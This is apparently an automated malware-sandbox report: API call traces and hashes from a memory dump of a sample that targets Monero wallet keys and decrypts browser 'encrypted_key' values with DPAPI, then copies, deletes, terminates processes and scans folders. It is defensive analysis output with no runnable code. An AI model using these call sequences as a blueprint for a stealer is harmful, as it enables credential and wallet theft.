                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00E4A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 00E4A6BC
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E4A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 0fc9c53ec23262ab87555852a262843b4c97ca3389d7f834b8ec9af27305fe04
                                  • Instruction ID: df943d582f266519c2e6a7b5ff0c4055f468df8f29df2d99164cd4cf3544306e
                                  • Opcode Fuzzy Hash: 0fc9c53ec23262ab87555852a262843b4c97ca3389d7f834b8ec9af27305fe04
                                  • Instruction Fuzzy Hash: 6EE111728101189ACB18FBA4DC96EEE7378BF54301F549A79F91772091EF346A0DCB62
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D481
                                  • lstrlen.KERNEL32(00000000), ref: 00E4D698
                                  • lstrlen.KERNEL32(00000000), ref: 00E4D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E4D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 1c68581d237b2873806fb11dc7f215ce0481ae8ae92e1dad1fb382049cf3b3cc
                                  • Instruction ID: 66249ccc20d31213f75660a875c5d564d153bf40c1a4a8943da126b6bd571920
                                  • Opcode Fuzzy Hash: 1c68581d237b2873806fb11dc7f215ce0481ae8ae92e1dad1fb382049cf3b3cc
                                  • Instruction Fuzzy Hash: EC911E729101189ACB18FBA0DC96DEE7378BF54301F545A79F947B2092EF346A0DCB62
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D801
                                  • lstrlen.KERNEL32(00000000), ref: 00E4D99F
                                  • lstrlen.KERNEL32(00000000), ref: 00E4D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E4DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 815199c9915c212e244cfe8b7d4909bc5ec48dd61810f4db2a794f6954f5deb7
                                  • Instruction ID: 6691eaecc4969c37c99ded2a1c4a2b1eacb97e38e64fbc0f5b2f41e814f2f0c0
                                  • Opcode Fuzzy Hash: 815199c9915c212e244cfe8b7d4909bc5ec48dd61810f4db2a794f6954f5deb7
                                  • Instruction Fuzzy Hash: 48811E729101189ACB18FBA4DC96DEE7378BF54301F445A39F947B6092EF346A0DCB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: c6f262f21a4423362b82930a0a7e59d874ca06f8d3f594463b95cdf02ed8317a
                                  • Instruction ID: eb21cdafa620a69b49b3cd3d8fe75b77106f5d72d158f4ef844732318c5fa922
                                  • Opcode Fuzzy Hash: c6f262f21a4423362b82930a0a7e59d874ca06f8d3f594463b95cdf02ed8317a
                                  • Instruction Fuzzy Hash: 7E416171D10208EFCB04EFB4D845AEEB7B4BF44345F049929E91677281DB759A09CFA2
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
                                    • Part of subcall function 00E499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                    • Part of subcall function 00E499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                    • Part of subcall function 00E499C0: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                    • Part of subcall function 00E499C0: LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                    • Part of subcall function 00E499C0: CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                    • Part of subcall function 00E58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E49D39
                                    • Part of subcall function 00E49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49AEF
                                    • Part of subcall function 00E49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E44EEE,00000000,?), ref: 00E49B01
                                    • Part of subcall function 00E49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49B2A
                                    • Part of subcall function 00E49AC0: LocalFree.KERNEL32(?,?,?,?,00E44EEE,00000000,?), ref: 00E49B3F
                                    • Part of subcall function 00E49B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E49B84
                                    • Part of subcall function 00E49B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E49BA3
                                    • Part of subcall function 00E49B60: LocalFree.KERNEL32(?), ref: 00E49BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: a768bb1c0aba9fb58ce9c8eb62675aa7454c1fb2a819d1ca7168b31be86593c3
                                  • Instruction ID: 3bc492d923f7f4eb4b2601d7348d3b5d1cbca8ff5f5b139776e2330b85860f70
                                  • Opcode Fuzzy Hash: a768bb1c0aba9fb58ce9c8eb62675aa7454c1fb2a819d1ca7168b31be86593c3
                                  • Instruction Fuzzy Hash: 593132B6D10209ABCF14DFE4ED85AEFB7B8BF48304F145559E905B7242EB349A04CBA1
                                  APIs
                                  • memset.MSVCRT ref: 00E594EB
                                    • Part of subcall function 00E58D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E5951E,00000000), ref: 00E58D5B
                                    • Part of subcall function 00E58D50: RtlAllocateHeap.NTDLL(00000000), ref: 00E58D62
                                    • Part of subcall function 00E58D50: wsprintfW.USER32 ref: 00E58D78
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00E595AB
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E595C9
                                  • CloseHandle.KERNEL32(00000000), ref: 00E595D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 47176acb610448a1ee26232607143d4efa23797e64b24cf31a3b6f52bc424276
                                  • Instruction ID: f8402ee912c12779a76614cecb08667c5d2e63cd4f725521f534a00f7c33e5f4
                                  • Opcode Fuzzy Hash: 47176acb610448a1ee26232607143d4efa23797e64b24cf31a3b6f52bc424276
                                  • Instruction Fuzzy Hash: 78313E71E00208DFDB14DBD0CD49BEDB7B8FB44301F104559E906AB589EB799A89CB51
                                  APIs
                                  • __getptd.LIBCMT ref: 00E5C74E
                                    • Part of subcall function 00E5BF9F: __amsg_exit.LIBCMT ref: 00E5BFAF
                                  • __getptd.LIBCMT ref: 00E5C765
                                  • __amsg_exit.LIBCMT ref: 00E5C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00E5C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 6b523b54ff9451acb484281174116a72d6695eee5196930001e0e9327ea9ab95
                                  • Instruction ID: 1f06d7bd17b8396191adaa47c6a36ab57ece2094abc66cf904b29ff67484f9aa
                                  • Opcode Fuzzy Hash: 6b523b54ff9451acb484281174116a72d6695eee5196930001e0e9327ea9ab95
                                  • Instruction Fuzzy Hash: D2F09032A007109FD720BBB85C0674A33E06F04767F38694AFC14B65D2DB6459889E66
                                  APIs
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54F7A
                                  • lstrcat.KERNEL32(?,00E61070), ref: 00E54F97
                                  • lstrcat.KERNEL32(?,01CB98E0), ref: 00E54FAB
                                  • lstrcat.KERNEL32(?,00E61074), ref: 00E54FBD
                                    • Part of subcall function 00E54910: wsprintfA.USER32 ref: 00E5492C
                                    • Part of subcall function 00E54910: FindFirstFileA.KERNEL32(?,?), ref: 00E54943
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E60FDC), ref: 00E54971
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E60FE0), ref: 00E54987
                                    • Part of subcall function 00E54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E54B7D
                                    • Part of subcall function 00E54910: FindClose.KERNEL32(000000FF), ref: 00E54B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 050fc495dfba3ba6762f9279f713897a26709b7692211042143276dc13ff6ead
                                  • Instruction ID: 1225150ab174e6a42c49fd3b2684af95ada6a0753c3d2c7080e9bc2945c51569
                                  • Opcode Fuzzy Hash: 050fc495dfba3ba6762f9279f713897a26709b7692211042143276dc13ff6ead
                                  • Instruction Fuzzy Hash: B121CD76A04204E7CB64F770EC46EED337CA754300F005595B6C963585EE7996CCCBA1